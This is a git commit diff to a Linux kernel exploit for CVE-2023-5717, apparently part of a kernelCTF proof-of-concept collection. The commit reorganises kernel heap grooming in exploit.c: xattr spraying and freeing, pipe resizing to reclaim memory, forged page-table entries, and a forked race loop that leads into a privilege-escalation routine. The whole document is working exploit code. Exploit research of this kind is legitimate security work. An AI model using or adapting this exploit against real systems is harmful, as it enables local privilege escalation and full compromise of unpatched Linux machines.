Remove race_id & Fix kernel mem layout for exploit

msh1307 · msh1307 · commit 9ed304db6f59 · 2025-02-22T22:49:54.000+09:00
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c
@@ -278,7 +278,7 @@ void print_proc_self_maps_raw() {
 
     close(fd);
 }
-int race_id;
+
 void race(int group_leader) { // caller must have ownership of the group
     int pipefd[2];
     uint64_t buf[0x4000] = {0, };
@@ -289,27 +289,6 @@ void race(int group_leader) { // caller must have ownership of the group
     }
     int ppid = getppid();
     int status;
-    key_t keyid;
-    if (race_id == 1) {
-        spray_xattr_page(0x3008, 12, 1); // 12296
-        spray_xattr_page(0x4008, 2, 1); // 16392
-        remove_xattr("security.x16392_0", 1);
-        remove_xattr("security.x16392_1", 1);
-        remove_xattr("security.x12296_5", 1);
-        remove_xattr("security.x12296_6", 1);
-        remove_xattr("security.x12296_11", 1);
-        resize_pipe(vuln_pipe[1], 0x1000 * 220);
-        remove_xattr("security.x12296_10", 1);
-        remove_xattr("security.x12296_7", 1); 
-        if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
-            perror("reclaim failed");
-            exit(EXIT_FAILURE);
-        }
-    }
-    if (setxattr("/tmp/x1", "security.ssiphim", buf, 0x3008, 0) < 0) {
-        perror("reclaim failed");
-        exit(EXIT_FAILURE);
-    }   
     pid_t child_pid = fork();
     if (child_pid == 0) {  // child read
         for (int i=0; i<512+511; i++){
@@ -332,11 +311,16 @@ void race(int group_leader) { // caller must have ownership of the group
         for (int _=0; _<32; _++) {
             read(group_leader, buf, sizeof(buf));
         }
-        remove_xattr("security.ssiphim", 1);
+        remove_xattr("security.x12296_ssiphim", 1);
         if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
             perror("reclaim failed");
             exit(EXIT_FAILURE);
         }
+
+        if (setxattr("/tmp/x1", "security.x12296_ssiphim", buf, 0x3008, 0) < 0) {
+            perror("reclaim failed");
+            exit(EXIT_FAILURE);
+        }   
         uint64_t ptes[512]; 
         for (int _=0; _<512; _++)
             ptes[_] = 0x8000000000000067;
@@ -568,9 +552,28 @@ uint64_t lpe_gogosing(int ii, int jj) {
 void exploit(){
     _pin_to_cpu(CPU_A); // main core
     sched_yield();
-    for (int _=0; _<MAX_TRY; _++) {
+
+    spray_xattr_page(0x3008, 12, 1); // 12296
+    spray_xattr_page(0x4008, 2, 1); // 16392
+    remove_xattr("security.x16392_0", 1);
+    remove_xattr("security.x16392_1", 1);
+    remove_xattr("security.x12296_5", 1);
+    remove_xattr("security.x12296_6", 1);
+    remove_xattr("security.x12296_11", 1);
+    resize_pipe(vuln_pipe[1], 0x1000 * 220);
+    remove_xattr("security.x12296_10", 1);
+    remove_xattr("security.x12296_7", 1); 
+    if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
+        perror("reclaim failed");
+        exit(EXIT_FAILURE);
+    }
+    if (setxattr("/tmp/x1", "security.ssiphim", buf, 0x3008, 0) < 0) {
+        perror("reclaim failed");
+        exit(EXIT_FAILURE);
+    }
+
+    for (int i=0; i<MAX_TRY; i++) {
     r3try:
-        race_id++;
         pid_t pid = fork();
         if (pid == 0) {
             int ret = 0;
@@ -611,7 +614,7 @@ void exploit(){
             //     ret = 1;
             //     goto gg;
             // }
-
+            
             kill(siblings_fork_pid[0], SIGCONT); 
             for (int _=0; _<RACE_PER_ITER; _++) {
                 atomic_store(&race_sync, 0); 
